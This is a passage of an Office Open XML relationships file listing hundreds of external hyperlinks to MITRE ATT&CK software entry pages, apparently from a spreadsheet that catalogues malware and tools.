Target="https://attack.mitre.org/software/S0224" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0029" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0689" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0276" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0458" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1049" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0473" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0694" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0211" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0630" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0682" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0462" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1021" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0208" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0658" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0120" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0398" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0166" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0382" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0068" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0532" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0138" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0188" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0520" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0351" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0062" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0501" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0221" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1013" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1028" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1044" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0581" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1012" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0583" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0253" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0067" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0669" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0449" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0083" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0007" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0606" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0107" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0235" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0229" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0098" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0155" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0032" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0367" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0493" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0061" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0258" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0533" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0599" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0646" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0622" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0486" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0272" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0150" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1011" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0059" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0244" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1014" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0267" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0697" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0556" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0169" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0189" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0562" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0031" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0023" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0513" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0210" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0094" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0341" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0600" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0355" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0013" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0101" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0389" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0125" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0596" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0360" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0500" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0402" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0633" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0142" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0022" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0484" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0575" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0593" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0026" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1017" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0650" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0110" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0331" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0135" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0441" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0085" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0103" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0356" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0576" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0079" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0164" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0234" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1041" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0498" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0634" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0366" TargetMode="External"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0071" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0531" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0684" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0649" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0099" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1027" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0250" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0198" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0519" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0595" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0651" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0673" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0056" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0005" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0036" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0683" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0172" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0483" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0681" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1019" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0642" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0137" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0186" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0178" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0086" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0348" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0091" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0143" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0237" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0644" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0371" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0012" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0112" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0379" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1043" TargetMode="External"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0283" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0561" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0087" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0201" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0641" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0233" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0195" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0464" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0491" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0373" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0114" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0252" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0050" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0187" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1026" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0226" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0665" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0442" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0191" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0527" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0660" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0064" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0173" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0168" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0033" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0598" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0587" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0393" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0686" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0153" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0251" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0227" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0066" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0376" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0434" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0265" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0433" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0128" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0534" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0687" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0397" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0455" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0179" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0157" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0546" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0146" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0647" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0612" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0204" 